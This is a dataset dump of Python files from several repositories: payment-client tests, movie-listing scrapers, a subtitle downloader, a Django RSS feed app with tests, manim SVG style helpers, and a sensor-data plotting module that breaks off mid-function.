metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "5parkp1ug/razorpay-python",
"score": 2
} |
#### File: razorpay-python/tests/test_client_payment.py
```python
import responses
import json
from .helpers import mock_file, ClientTestCase
class TestClientPayment(ClientTestCase):
def setUp(self):
super(TestClientPayment, self).setUp()
self.base_url = '{}/payments'.format(self.base_url)
@responses.activate
def test_payment_all(self):
result = mock_file('payment_collection')
url = self.base_url
responses.add(responses.GET, url, status=200,
body=json.dumps(result), match_querystring=True)
self.assertEqual(self.client.payment.all(), result)
@responses.activate
def test_payment_all_with_options(self):
count = 1
result = mock_file('payment_collection_with_one_payment')
url = '{}?count={}'.format(self.base_url, count)
responses.add(responses.GET, url, status=200, body=json.dumps(result),
match_querystring=True)
self.assertEqual(self.client.payment.all({'count': count}), result)
@responses.activate
def test_payment_fetch(self):
result = mock_file('fake_payment')
url = '{}/{}'.format(self.base_url, self.payment_id)
responses.add(responses.GET, url, status=200, body=json.dumps(result),
match_querystring=True)
self.assertEqual(self.client.payment.fetch('fake_payment_id'), result)
@responses.activate
def test_payment_capture(self):
result = mock_file('fake_captured_payment')
url = '{}/{}/capture'.format(self.base_url, self.payment_id)
responses.add(responses.POST, url, status=200,
body=json.dumps(result), match_querystring=True)
self.assertEqual(self.client.payment.capture(self.payment_id,
amount=5100), result)
@responses.activate
def test_refund_create(self):
result = mock_file('fake_refund')
url = '{}/{}/refund'.format(self.base_url, self.payment_id)
responses.add(responses.POST, url, status=200, body=json.dumps(result),
match_querystring=True)
self.assertEqual(self.client.payment.refund(self.payment_id, 2000),
result)
@responses.activate
def test_transfer(self):
param = {
'transfers': {
'currency': {
'amount': 100,
'currency': 'INR',
'account': 'dummy_acc'
}
}
}
result = mock_file('transfers_collection_with_payment_id')
url = '{}/{}/transfers'.format(self.base_url, self.payment_id)
responses.add(responses.POST, url, status=200, body=json.dumps(result),
match_querystring=True)
self.assertEqual(self.client.payment.transfer(self.payment_id, param),
result)
@responses.activate
def test_transfer_fetch(self):
result = mock_file('transfers_collection_with_payment_id')
url = '{}/{}/transfers'.format(self.base_url, self.payment_id)
responses.add(responses.GET, url, status=200, body=json.dumps(result),
match_querystring=True)
self.assertEqual(self.client.payment.transfers(self.payment_id), result)
@responses.activate
def test_bank_transfer_fetch(self):
result = mock_file('fake_bank_transfer')
url = '{}/{}/bank_transfer'.format(self.base_url, self.payment_id)
responses.add(responses.GET,
url,
status=200,
body=result,
match_querystring=True)
response = self.client.payment.bank_transfer(self.payment_id)
self.assertEqual(response['virtual_account_id'], '<KEY>')
self.assertEqual(response['payment_id'], self.payment_id)
``` |
{
"source": "5parkp1ug/sgScraper",
"score": 3
} |
#### File: 5parkp1ug/sgScraper/eng_movies_provider.py
```python
import re
import urllib
from bs4 import BeautifulSoup
import unicodedata
import urlparse
class eng_movies_provider:
"""docstring for eng_movies_provider"""
def set_url(self, url):
self.url = url
self.level1_urls = {}
self.level2_urls = {}
def getSoup(self, url):
try:
html = urllib.urlopen(url)
except IOError:
return {
"status": False,
"message": "Please check your connectivity."
}
bs = BeautifulSoup(html.read(),"lxml")
return {
"status": True,
"soup": bs
}
def getUrls(self):
print "[INFO] Starting Scraping Level 1"
response = self.getSoup(self.url)
if response['status']:
bs = response['soup']
else:
return response
level1_tags = bs.findAll("a",{"class":"button"})
print "[RESULT] %d URLs found"%(len(level1_tags))
for tag in level1_tags:
range_text = unicodedata.normalize('NFKD', tag.text).encode('ascii','ignore').replace(" ","")
range_url = tag["href"]
# level1_urls[range_text] = range_url
self.scrape_level2(range_url)
return self.level2_urls
def scrape_level2(self, range_url):
print "[INFO] Starting Scraping Level 2"
#find the sub-categorization in the page and get their url
response = self.getSoup(range_url)
if response['status']:
bs = response['soup']
else:
return response
no_of_links = bs.findAll("a",href= re.compile('^\/English*'))
print "[RESULT] %d URLs found"%(len(no_of_links))
for item in no_of_links:
movie_range = item.text.strip("English Movies ").strip("(").strip(")").replace(" ","")
movie_range_url = range_url + item['href'][1:].replace(" ","%20")
# print movie_range +" --> "+ movie_range_url
self.level2_urls[movie_range] = movie_range_url
return self.level2_urls
```
#### File: 5parkp1ug/sgScraper/get_all_links.py
```python
import re
import urllib
from datetime import datetime
from urlparse import urlparse
from bs4 import BeautifulSoup
url = "http://58.65.128.2:602/English%20Movies%20(H%20-%20L)/?sortby="
# url = "http://58.65.128.2:603/English Movies (S - T)/War Dogs 2016 HDTS?sortby="
result = []
def get_all_movies(url):
response = {}
o = urlparse(url)
base_url = o.netloc
html = urllib.urlopen(url)
bs = BeautifulSoup(html.read(),"lxml")
#find the no of available links
all_links = bs.findAll("tr",style = False)
for link in all_links:
full_url = "http://"+base_url+link.td.next.next.next.a['href']
full_url = full_url.encode("utf-8").lower()
movie_name = link.td.next.next.next.a.getText()
if "." not in movie_name and "xampp" not in movie_name:
print "Directory: " + link.td.next.next.next.a.getText()
get_all_movies(full_url)
elif ".m4v" in full_url or ".rm" in full_url or ".mov" in full_url or ".wmv" in full_url or ".divx" in full_url or ".rmvb" in full_url or ".vob" in full_url or ".avi" in full_url or ".mp4" in full_url or ".flv" in full_url or ".mkv" in full_url or ".zip" in full_url or ".dat" in full_url or ".rar" in full_url:
response = {
'url' : full_url,
'name': movie_name
}
print response
result.append(response)
print "===================================="
elif ".srt" in full_url or ".sub" in full_url:
#subtitle found do something
pass
elif ".mpg" in full_url or ".mht" in full_url or ".jpeg" in full_url or ".jpg" in full_url:
pass
```
#### File: 5parkp1ug/sgScraper/sgMovies_muli_proc.py
```python
import re
import urllib
import Queue
import urlparse
from bs4 import BeautifulSoup
from datetime import datetime
from multiprocessing import Pool, Value
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
def scrape_level1(url):
bs = BeautifulSoup(url.read(),"lxml")
level1_tags = bs.findAll("a",{"class":"button"})
for tag in level1_tags:
level1_urls.append(tag["href"])
scrape_level2(tag["href"])
def scrape_level2(url):
#find the sub-categorization in the page and get their url
html = urllib.urlopen(url)
bs = BeautifulSoup(html.read(),"lxml")
no_of_links = bs.findAll("tr",{"onclick":True})
for link in no_of_links:
path = link['onclick'].strip("window.location='/").strip("=';").strip("?sortby").replace(" ","%20")
full_url = url+path
level2_urls.append(full_url)
def init(counter):
global moviectr
moviectr = counter
def scrape_level3(full_url):
print "calling scrape level 3"
#find the name of the movies from the sub-categpry page
html = urllib.urlopen(full_url)
bs = BeautifulSoup(html.read(),"lxml")
movies = bs.findAll("a",re.compile('^\/English*'))
print len(movies)
o = urlparse.urlparse(full_url)
url = o.netloc
for movie in movies:
print bcolors.HEADER + "Movie Name - %s"%(movie.getText()) # Name of the movie
level3_urls.append(movie.getText())
moviectr+=1
print moviectr
#print bcolors.OKBLUE + "http://"+url+path
# path = movie['href'].replace(" ","%20")
# if path != '/':
# if "Harry" in "http://"+url+path:
# print "http://"+url+path
##################################################################################
#Variables
level1_urls = []
level2_urls = []
level3_urls = []
# capture current time
startTime = datetime.now()
url = urllib.urlopen('http://www.sharinggalaxy.com/14/ToServer.jsp?type=em&server=three')
scrape_level1(url)
print level1_urls
print level2_urls
#create a Multiprocessing value for counter
moviectr = Value('i',1)
print moviectr
p = Pool(initializer=init, initargs=(moviectr,))
p.map(scrape_level3,level2_urls)
print moviectr
# print current time minus the start time
print datetime.now()-startTime
``` |
{
"source": "5parkp1ug/SubtitleDownloader",
"score": 3
} |
#### File: 5parkp1ug/SubtitleDownloader/getSub.py
```python
import os, hashlib, sys, urllib2
''' 1 = File does not exist
2 = Subtitle not found
'''
class utilities(object):
def __init__(self, name):
self.name = name
def get_hash(self):
self.readsize = 64 * 1024
try:
with open(self.name, 'rb') as self.f:
self.size = os.path.getsize(self.name)
self.data = self.f.read(self.readsize)
self.f.seek(-self.readsize, os.SEEK_END)
self.data += self.f.read(self.readsize)
self.calHash = hashlib.md5(self.data).hexdigest()
return 0
except IOError:
return 1
def get_subtitle(self):
self.url = 'http://sandbox.thesubdb.com/?action=download&hash='+str(self.calHash)+'&language=en'
self.opener = urllib2.build_opener()
self.req = urllib2.Request(self.url)
self.req.add_header('User-Agent', 'SubDB/1.0 (GetSubtitle/0.1; http://github.com/abhijh/getsubtitle)')
try:
self.subtitle = self.opener.open(self.req)
return 0
except (urllib2.HTTPError):
return 2
def write_subtitle(self):
with open(self.name[0:-4]+'.srt','w') as self.file:
self.file.write(self.subtitle.read())
return 0
def main():
process = utilities(sys.argv[1])
responce = process.get_hash()
if responce == 1:
print 'IOError'
else:
responce = process.get_subtitle()
if responce == 2:
print 'Subtitle not found on Server'
else:
responce = process.write_subtitle()
if responce == 0:
print 'Subtitle Generated Successfully'
else:
print 'Subtitle found but could not be written.'
if __name__ == '__main__':
main()
``` |
{
"source": "5pence/rss_helper",
"score": 2
} |
#### File: management/commands/fetch_feed.py
```python
from django.core.management.base import BaseCommand
from feed.tasks import import_feed_task
from rssfeed.models import Feed
class Command(BaseCommand):
help = ''
def add_arguments(self, parser):
parser.add_argument('--url', type=str)
parser.add_argument('--id', type=int)
def handle(self, *args, **options):
feed = Feed.objects.get(pk=options['id'])
import_feed_task.delay(feed.id)
```
#### File: rss_helper/feed/tasks.py
```python
import logging
from datetime import timedelta
from django.utils import timezone
from django.conf import settings
from celery import shared_task
from rssfeed.models import Feed
from feed.utils import import_items, ImportFailed
logger = logging.getLogger(__name__)
@shared_task
def import_feed_task(feed_id: int):
logger.info('fetching id %d' % feed_id)
feed = Feed.objects.get(pk=feed_id)
try:
import_items(feed)
feed.last_checked_at = timezone.now()
feed.fail_count = 0
except ImportFailed:
""" If for any reason the fetching of the remote xml fails we will increase a fail counter
the fail counter is also a threshold, after X number of fails don't bother
we set last_checked_at to the future, our import_feeds checks only for feeds that
were last checked in the past. """
feed.fail_count += 1
feed.last_checked_at = timezone.now() + timedelta(minutes=(2 ** feed.fail_count))
feed.save()
@shared_task
def import_feeds():
""" Search for feeds that are in need of updating
ignore any feeds that have surpassed a certain configurable threshold
see settings to update FAIL_COUNT_THRESHOLD to a suitable value """
fail_count_threshold = settings.FAIL_COUNT_THRESHOLD
feeds = Feed.objects.filter(last_checked_at__lte=timezone.now(), fail_count__lte=fail_count_threshold)
for feed in feeds:
import_feed_task.delay(feed.id)
```
#### File: rss_helper/rssfeed/tests.py
```python
from django.test import TestCase, Client
from django.contrib.auth.models import User
from django.urls import reverse
from django.utils import timezone
from rssfeed.models import Feed, FeedItem, Comment
from feed.tasks import import_feed_task
from datetime import timedelta
class FeedTest(TestCase):
def setUp(self):
""" Set up our test user """
password = '<PASSWORD>'
self.user = User.objects.create(
username='<EMAIL>',
password=password,
is_active=True
)
self.user.set_password(password)
self.user.save()
self.client = Client()
self.client.login(username=self.user.username, password=password)
def test_add_feed_success(self):
""" Add a feed and ensure the added feed message is displayed on page and also ensures that user2 does not
see it
"""
url = reverse('add_feed')
# Get the count of feeds
before_count = self.user.feed_set.all().count()
response = self.client.post(
url,
data={
'title': 'random feed',
'url': 'http://www.nu.nl/rss/Algemeen'
})
# Assert status code is OK
self.assertEqual(response.status_code, 200)
# Assert message is displayed on page
self.assertContains(response, 'Your feed was added, '
'it may take up to a minute for you '
'to see some feed items')
# Get the current count of feeds
after_count = self.user.feed_set.all().count()
# Assert we have an additional one
self.assertEqual(after_count - before_count, 1)
# Create a second user
password = '<PASSWORD>'
self.user2 = User.objects.create(
username='<EMAIL>',
password=password,
is_active=True
)
self.user2.set_password(password)
self.user2.save()
self.client = Client()
# login user2
self.client.login(username=self.user.username, password=password)
# Get the current count of feeds for user2
user2_count = self.user2.feed_set.all().count()
# Assert that user2 count is still zero
self.assertEqual(user2_count, 0)
def test_add_feed_fail_no_auth(self):
""" Check an unauthorised user cannot add a feed """
# Create a client
c = Client()
# Go to add feed page
url = reverse('add_feed')
# Count current number of feeds
before_count = self.user.feed_set.all().count()
# Attempt to add a feed
response = c.post(
url,
data={
'title': 'random feed',
'url': 'https://google.com/xml'
})
# Check we re redirected as we are unauthorised
self.assertEqual(response.status_code, 302)
# Check no feeds were added to the database
self.assertEqual(before_count, self.user.feed_set.all().count())
def test_add_feed_fail_bad_url(self):
""" Test adding a feed with a bad url string that isn't a rss feed """
url = reverse('add_feed')
# Count all feeds
before_count = self.user.feed_set.all().count()
# Post a feed with a bad url
response = self.client.post(
url,
data={
'title': 'random feed',
'url': 'https://google.com/xml'
})
self.assertEqual(response.status_code, 200)
# Check the two error messages are returned on page
self.assertContains(response, 'Invalid RSS Feed')
# Check no feed was added
self.assertEqual(before_count, self.user.feed_set.all().count())
def test_add_feed_fail_duplicate_title(self):
""" Test adding a feed with a duplicate title string """
response = ''
for i in range(0, 2):
url = reverse('add_feed')
# Post a feed with a bad url
response = self.client.post(
url,
data={
'title': 'random feed',
'url': 'http://www.nu.nl/rss/Algemeen'
})
self.assertEqual(response.status_code, 200)
# Check the two error messages are returned on page
self.assertContains(response, 'You already have that title in your feed, please choose another.')
# Check no feed was added
self.assertEqual(self.user.feed_set.all().count(), 1)
def test_update_feed(self):
""" Test to update feed details """
feed = Feed.objects.create(
user=self.user,
title='random feed',
url='http://www.nu.nl/rss/Algemeen'
)
url = reverse('update_feed', kwargs={'pk': feed.id})
# get current feed count
before_count = self.user.feed_set.all().count()
# update feed with new title
response = self.client.post(
url,
data={
'title': 'another random feed',
'url': 'http://www.nu.nl/rss/Algemeen'
},
follow=True
)
self.assertEqual(response.status_code, 200)
# check we get success message
self.assertContains(response, "successfully updated your feed")
self.assertContains(response, "another random feed")
# count feeds again
after_count = self.user.feed_set.all().count()
# ensure no duplicates were made
self.assertEqual(before_count, after_count)
def test_add_bookmark(self):
""" Bookmark a feed item and ensure it shows on my favourites page """
# create a feed
feed = Feed.objects.create(
user=self.user,
title='random feed',
url='http://www.nu.nl/rss/Algemeen'
)
# add a feed item to feed, although the model presently defaults is_bookmarked to False set it anyway
feeditem = FeedItem.objects.create(
feed=feed,
title='great feed item',
text='some text about great feed item',
is_bookmarked=False,
url='https://google.com'
)
# goto my favourites page and ensure the feed item is not there
url = reverse('my_favourite_feeds')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, 'random feed')
# bookmark the feed item
url = reverse('toggle_bookmark', kwargs={'pk': feeditem.id})
self.client.get(url)
# goto my favourites page and ensure the feed item is there
url = reverse('my_favourite_feeds')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'random feed')
self.assertContains(response, 'Favourite items')
self.assertContains(response, '<mark>1</mark>')
def test_unread_count(self):
""" Add a feed, a feed item and check the is_read counter is 1 then No unread items"""
# create a feed
feed = Feed.objects.create(
user=self.user,
title='random feed',
url='http://www.nu.nl/rss/Algemeen'
)
# add a feed item to feed
feeditem = FeedItem.objects.create(
feed=feed,
title='great feed item',
text='some text about great feed item',
url='https://google.com'
)
# goto my_feeds page
url = reverse('my_feeds')
response = self.client.get(url)
# make sure Unread items:1 is on page
self.assertContains(response, 'Unread items')
self.assertContains(response, '<mark>1</mark>')
# now visit that feed item
url = reverse('feed_item', kwargs={'pk': feeditem.id})
response = self.client.get(url)
# ensure the text of the feed item is present
self.assertContains(response, 'great feed item')
# go back to my_feeds
url = reverse('my_feeds')
# Ensure that 'No unread items' is on page
response = self.client.get(url)
self.assertContains(response, 'No unread items')
def test_remove_feed(self):
# create feed
feed = Feed.objects.create(
user=self.user,
title='random feed',
url='http://www.nu.nl/rss/Algemeen'
)
# goto my_feeds page and ensure it is there
url = reverse('my_feeds')
response = self.client.get(url)
self.assertContains(response, 'random feed')
# remove the feed
url = reverse('remove_feed', kwargs={'pk': feed.id})
# goto my_feeds page and ensure we get the message and the feed is not there
response = self.client.get(
url,
follow=True
)
self.assertContains(response, 'Your feed was deleted')
self.assertNotContains(response, 'random feed')
def test_add_and_remove_comment(self):
feed = Feed.objects.create(
user=self.user,
title='random feed',
url='http://www.nu.nl/rss/Algemeen'
)
# add a feed item to feed, although the model presently defaults is_bookmarked to False set it anyway
feeditem = FeedItem.objects.create(
feed=feed,
title='great feed item',
text='some text about great feed item',
is_bookmarked=False,
url='https://google.com'
)
# add a comment to the feed item
comment = Comment.objects.create(
feed_item=feeditem,
text='a small comment'
)
# check the comment shows on page
url = reverse('feed_item', kwargs={'pk': feeditem.id})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'a small comment')
# now delete comment
url = reverse('delete_comment', kwargs={'pk': comment.id})
self.client.get(url)
# goto the feed item
url = reverse('feed_item', kwargs={'pk': feeditem.id})
response = self.client.get(url)
# ensure we get delete message and that the comment is no longer there
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'Your comment was deleted')
self.assertNotContains(response, 'a small comment')
def test_feed_import_fail_backoff(self):
""" Test exponential backoff algorithm by using a bad feed url
and ensures a restart button is present after 10 failed tests on the My Feeds page
"""
feed = Feed.objects.create(
title='test',
url='https://google.com/xml',
user=self.user
)
# Loop the fail 11 times
for i in range(0, 11):
# get the feed
import_feed_task(feed.id)
# refresh what's being held in the database
feed.refresh_from_db()
# assert the fail count increased by 1
self.assertEqual(feed.fail_count, i + 1)
# calculate the next feed time 2 exponential fail count
next_run_datetime = timezone.now() + timedelta(minutes=2 ** feed.fail_count)
""" Due to microseconds being in the datetime object and local timezone.now()
minutely different to the database timezone.now() we assert our calculated time
is almost equal within 1 second to the actual time recorded in database
"""
self.assertAlmostEqual(
feed.last_checked_at,
next_run_datetime,
delta=timezone.timedelta(seconds=1)
)
# now get the content of my feeds page
response = self.client.get('/rssfeed/my_feeds/')
# as the feed has failed over 10 times assert failed message is on page
self.assertContains(response, 'Sorry, this feed has failed many times')
# and that the button labelled 'Restart Feed' is present
self.assertContains(response, 'Restart Feed')
# now we restart feed
url = reverse('reset_fail_count', kwargs={'pk': feed.id})
response = self.client.get(url, follow=True)
feed.refresh_from_db()
# ensure that fail count is set back to zero
self.assertEqual(feed.fail_count, 0)
# and that 'Restart Feed' does not appear on page
self.assertNotContains(response, 'Restart Feed')
``` |
{
"source": "5Points7Edges/manim",
"score": 3
} |
#### File: mobject/svg/style_utils.py
```python
__all__ = ["cascade_element_style", "parse_style", "parse_color_string"]
from xml.dom.minidom import Element as MinidomElement
from colour import web2hex
from ...utils.color import rgb_to_hex
from typing import Dict, List
CASCADING_STYLING_ATTRIBUTES: List[str] = [
"fill",
"stroke",
"fill-opacity",
"stroke-opacity",
]
# The default styling specifications for SVG images,
# according to https://www.w3.org/TR/SVG/painting.html
# (ctrl-F for "initial")
SVG_DEFAULT_ATTRIBUTES: Dict[str, str] = {
"fill": "black",
"fill-opacity": "1",
"stroke": "none",
"stroke-opacity": "1",
}
def cascade_element_style(
element: MinidomElement, inherited: Dict[str, str]
) -> Dict[str, str]:
"""Collect the element's style attributes based upon both its inheritance and its own attributes.
SVG uses cascading element styles. A closer ancestor's style takes precedence over a more distant ancestor's
style. In order to correctly calculate the styles, the attributes are passed down through the inheritance tree,
updating where necessary.
Note that this method only copies the values and does not parse them. See :meth:`parse_color_string` for converting
from SVG attributes to manim keyword arguments.
Parameters
----------
element : :class:`MinidomElement`
Element of the SVG parse tree
inherited : :class:`dict`
Dictionary of SVG attributes inherited from the parent element.
Returns
-------
:class:`dict`
Dictionary mapping svg attributes to values with `element`'s values overriding inherited values.
"""
style = inherited.copy()
# cascade the regular elements.
for attr in CASCADING_STYLING_ATTRIBUTES:
entry = element.getAttribute(attr)
if entry:
style[attr] = entry
# the style attribute should be handled separately in order to
# break it up nicely. furthermore, style takes priority over other
# attributes in the same element.
style_specs = element.getAttribute("style")
if style_specs:
for style_spec in style_specs.split(";"):
try:
key, value = style_spec.split(":")
except ValueError as e:
if not style_spec.strip():
# there was just a stray semicolon at the end, producing an emptystring
pass
else:
raise e
else:
style[key.strip()] = value.strip()
return style
def parse_color_string(color_spec: str) -> str:
"""Handle the SVG-specific color strings and convert them to HTML #rrggbb format.
Parameters
----------
color_spec : :class:`str`
String in any web-compatible format
Returns
-------
:class:`str`
Hexadecimal color string in the format `#rrggbb`
"""
if color_spec[0:3] == "rgb":
# these are only in integer form, but the Colour module wants them in floats.
splits = color_spec[4:-1].split(",")
if splits[0][-1] == "%":
# if the last character of the first number is a percentage,
# then interpret the number as a percentage
parsed_rgbs = [float(i[:-1]) / 100.0 for i in splits]
else:
parsed_rgbs = [int(i) / 255.0 for i in splits]
hex_color = rgb_to_hex(parsed_rgbs)
elif color_spec[0] == "#":
# its OK, parse as hex color standard.
hex_color = color_spec
else:
# attempt to convert color names like "red" to hex color
hex_color = web2hex(color_spec, force_long=True)
return hex_color
def fill_default_values(svg_style: Dict) -> None:
"""
Fill in the default values for properties of SVG elements,
if they are not currently set in the style dictionary.
Parameters
----------
svg_style : :class:`dict`
Style dictionary with SVG property names. Some may be missing.
Returns
-------
:class:`dict`
Style attributes; none are missing.
"""
for key in SVG_DEFAULT_ATTRIBUTES:
if key not in svg_style:
svg_style[key] = SVG_DEFAULT_ATTRIBUTES[key]
def parse_style(svg_style: Dict[str, str]) -> Dict:
"""Convert a dictionary of SVG attributes to Manim VMobject keyword arguments.
Parameters
----------
svg_style : :class:`dict`
Style attributes as a string-to-string dictionary. Keys are valid SVG element attributes (fill, stroke, etc)
Returns
-------
:class:`dict`
Style attributes, but in manim kwargs form, e.g., keys are fill_color, stroke_color
"""
manim_style = {}
fill_default_values(svg_style)
if "fill-opacity" in svg_style:
manim_style["fill_opacity"] = float(svg_style["fill-opacity"])
if "stroke-opacity" in svg_style:
manim_style["stroke_opacity"] = float(svg_style["stroke-opacity"])
# nones need to be handled specially
if "fill" in svg_style:
if svg_style["fill"] == "none":
manim_style["fill_opacity"] = 0
else:
manim_style["fill_color"] = parse_color_string(svg_style["fill"])
if "stroke" in svg_style:
if svg_style["stroke"] == "none":
# In order to not break animations.creation.Write,
# we interpret no stroke as stroke-width of zero and
# color the same as the fill color, if it exists.
manim_style["stroke_width"] = 0
if "fill_color" in manim_style:
manim_style["stroke_color"] = manim_style["fill_color"]
else:
manim_style["stroke_color"] = parse_color_string(svg_style["stroke"])
return manim_style
``` |
{
"source": "5roop/SAAM_data_monitor",
"score": 2
} |
#### File: 5roop/SAAM_data_monitor/auth.py
```python
from secrets import hashes, salt
def pass_to_hash(password: str):
import hashlib
return hashlib.sha512(bytes(password.casefold(), "utf-8") + salt).hexdigest()
```
#### File: SAAM_data_monitor/utils/plot.py
```python
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
plt.rcParams["font.family"] = "serif"
from utils import acquire as ac
from utils import DATA_COLLECTIONS
import datetime
import diskcache as dc
cache = dc.Cache("cache/")
# def memoize(f):
# global cache
# def inner(*args, **kwargs):
# key = f"{args}|{kwargs}"
# is_future = args[2] > datetime.datetime.utcnow()
# try:
# print("Using cached version.")
# return cache[key]
# except Exception:
# res = f(*args, **kwargs)
# if not is_future:
# cache[key] = res
# return res
# return inner
# @memoize
@cache.memoize()
def make_figure(loc_id, start_date, end_date, base, plot_type, **kwargs):
if plot_type == 'plot bed sensor data':
return plot_bed(loc_id, start_date, end_date, base, **kwargs)
if plot_type == 'check data presence':
return plot_status(loc_id, start_date, end_date, base, **kwargs)
if plot_type == "plot clip sensor data":
return plot_clip(loc_id, start_date, end_date, base, **kwargs)
if plot_type == 'plot cooking':
return plot_cooking(loc_id, start_date, end_date, base, **kwargs)
if plot_type == 'plot walking':
return plot_clip_mobility(loc_id, start_date, end_date, base, **kwargs)
def plot_bed(loc_id, start, end, base, **kwargs):
fig, ax = plt.subplots(figsize=(8, 5), dpi=100)
ax.set_xlim((start, end))
end = end + datetime.timedelta(hours=2)
# Sensor raw data acquisition
if not kwargs.get("skip_mags", False):
payload = list()
for collection in DATA_COLLECTIONS:
payload += ac.download(loc_id, {"$regex":"sens_bed_accel_"}, start, end, base=base, collection=collection)
# payload = ac.download(loc_id, {"$regex":"sens_bed_accel_"}, start, end, base=base)
# payload += ac.download(loc_id, {"$regex":"sens_bed_accel_"}, start, end, base=base, )
for suffix in ["egw", "amb", "app"]:
cur_payload = [item for item in payload if item["SourceId"]==f'sens_bed_accel_{suffix}']
if cur_payload == []:
print(f"No data for {suffix}.")
continue
t, m = ac.magnitude_response_to_data(cur_payload)
ax.plot(pd.to_datetime(t, unit="ms"), m, label=suffix)
# Peak plotting:
extended_start = start - datetime.timedelta(days=1)
extended_end = end + datetime.timedelta(days=1)
pks = ac.download(loc_id, "feat_bed_accel_magnitude_peaks", extended_start, extended_end, collection="CoachingAdditionalDataSources", base=base)
if pks:
ls, ss = ac.peak_handler(pks)
ax.vlines(pd.to_datetime(ls, unit="s"), 0, 2, label="Large peaks", colors="r", linestyles="dashed", zorder=1)
ax.vlines(pd.to_datetime(ss, unit="s"), 0.5, 1.5, label="Small peaks", colors="g", linestyles="dotted", zorder=1)
else:
ax.text(start, 0.7, "No peak data available")
ax.set_ylim((0,2))
sleep_state = ac.download(loc_id, "feat_sleep_state", extended_start, extended_end, collection="CoachingAdditionalDataSources", base=base)
if sleep_state:
outs, ins, sleeps = ac.state_handler(sleep_state)
for i, item in enumerate(outs):
item = pd.to_datetime([*item], unit="s")
if i==0:
ax.hlines(0.5, item[0], item[1],
lw=10, colors="k", label="Out of bed")
else:
ax.hlines(0.5, item[0], item[1],
lw=10, colors="k")
for i, item in enumerate(ins):
item = pd.to_datetime([*item], unit="s")
if i==0:
ax.hlines(0.5, item[0], item[1],
lw=10, colors="r", label="In bed")
else:
ax.hlines(0.5, item[0], item[1],
lw=10, colors="r",)
for i, item in enumerate(sleeps):
item = pd.to_datetime([*item], unit="s")
if i==0:
ax.hlines(0.5, item[0], item[1],
lw=10, colors="tab:orange", label="Sleeping")
else:
ax.hlines(0.5, item[0], item[1],
lw=10, colors="tab:orange",)
else:
ax.text(start, 0.5, "No sleep state available")
ax.legend()
ax.set_title(f"{loc_id} bed sensor data, {base} database")
ax.set_ylabel("Magnitude (g)")
ax.set_xlabel("Datetime (UTC)")
fig.autofmt_xdate()
return fig
def plot_status(loc_id, start_date, end_date, base, **kwargs):
from .acquire import check_source_presence#_2 as check_source_presence
fig, ax = plt.subplots(figsize=(8, 5), dpi=100)
if "freq" not in kwargs.keys():
freq = "1h"
else:
freq = kwargs["freq"]
feature_list = ["sens_bed_accel_amb",
"sens_bed_accel_egw",
#"sens_bed_accel_app"
"sens_uwb_activity",
"sens_amb_1_temp",
"_power_",
*[f"sens_belt_accel_{i}" for i in [
'amb',
'app',
'egw']],
]
for i, source_id in enumerate(feature_list):
timerange, is_data = check_source_presence(
loc_id,
source_id,
start_date,
end_date,
base = base,
freq = freq)
jitter_factor = 0.05 # This shifts the points a bit to prevent overlap
jitter = i * jitter_factor
ax.scatter(timerange[:len(is_data)],
is_data + jitter,
label=source_id.replace("_", " "),
alpha=1,
s = 4,
)
#breakpoint()
ax.legend(loc="center right", ncol=2)
# ax.set_ylim((-0.1, 1.1))
ax.set_xlim((start_date, end_date))
ax.set_ylabel(f"Data present in {freq} intervals?")
ax.set_yticks([0,1], )
ax.set_yticklabels(["False", "True"])
ax.set_ylim([-0.2, 1.5])
ax.set_title(f"{loc_id}, sensor data on {base} database")
fig.autofmt_xdate()
return fig
def plot_status_mobility(loc_id, start_date, end_date, base, **kwargs):
from .acquire import check_source_presence#_2 as check_source_presence
fig, ax = plt.subplots(figsize=(8, 5), dpi=100)
if "freq" not in kwargs.keys():
freq = "1h"
else:
freq = kwargs["freq"]
feature_list = [#"sens_bed_accel_amb",
#"sens_bed_accel_egw",
#"sens_bed_accel_app"
#"sens_uwb_activity",
#"sens_amb_1_temp",
#"_power_",
*[f"sens_belt_accel_{i}" for i in [
'amb',
'app',
'egw']],
]
for i, source_id in enumerate(feature_list):
timerange, is_data = check_source_presence(
loc_id,
source_id,
start_date,
end_date,
base = base,
freq = freq)
jitter_factor = 0.05 # This shifts the points a bit to prevent overlap
jitter = i * jitter_factor
ax.scatter(timerange[:len(is_data)],
is_data + jitter,
label=source_id.replace("_", " "),
alpha=1,
s = 4,
)
#breakpoint()
ax.legend(loc="center right", ncol=2)
# ax.set_ylim((-0.1, 1.1))
ax.set_xlim((start_date, end_date))
ax.set_ylabel(f"Data present in {freq} intervals?")
ax.set_yticks([0,1], )
ax.set_yticklabels(["False", "True"])
ax.set_ylim([-0.2, 1.5])
ax.set_title(f"{loc_id}, sensor data on {base} database")
fig.autofmt_xdate()
return fig
def plot_clip(loc_id, start, end, base, **kwargs):
fig, ax = plt.subplots(figsize=(8, 5), dpi=100)
try:
payload = list()
for collection in DATA_COLLECTIONS:
payload += ac.download(
loc_id,
{"$regex": "_accel_"},
start,
end + datetime.timedelta(hours=2),
base=base,
collection=collection)
for placement in ["bed",
"belt",
"bracelet_right",
"bracelet_left",
"ankle",
"bracelet_right "]:
for suffix in ["egw", "amb", "app"]:
founds = [item for item in payload if item["SourceId"] == f"sens_{placement}_accel_{suffix}"]
if founds == []:
continue
t, m = ac.magnitude_response_to_data(founds)
ax.plot(
pd.to_datetime(t, unit="ms"),
m,
label = f"{placement} {suffix}",
alpha = 0.8)
ax.legend()
except Exception as e:
ax.text(start, 1, f"Accelerometry querying raised {e}")
ax.text(start, 0.7, f"Got exception: {e}")
ax.set_ylim((0, 1.5))
ax.set_xlim((start, end))
ax.set_title(f"{loc_id} clip sensor data, {base} database")
ax.set_ylabel("Magnitude (g)")
ax.set_xlabel("Datetime (UTC)")
fig.autofmt_xdate()
return fig
def plot_clip_mobility(loc_id, start, end, base, **kwargs):
fig, [ax, ax2] = plt.subplots(figsize=(8, 5), dpi=100, nrows=2, sharex=True)
try:
payload = list()
for collection in DATA_COLLECTIONS:
payload += ac.download(
loc_id,
{"$regex": "_accel_"},
start,
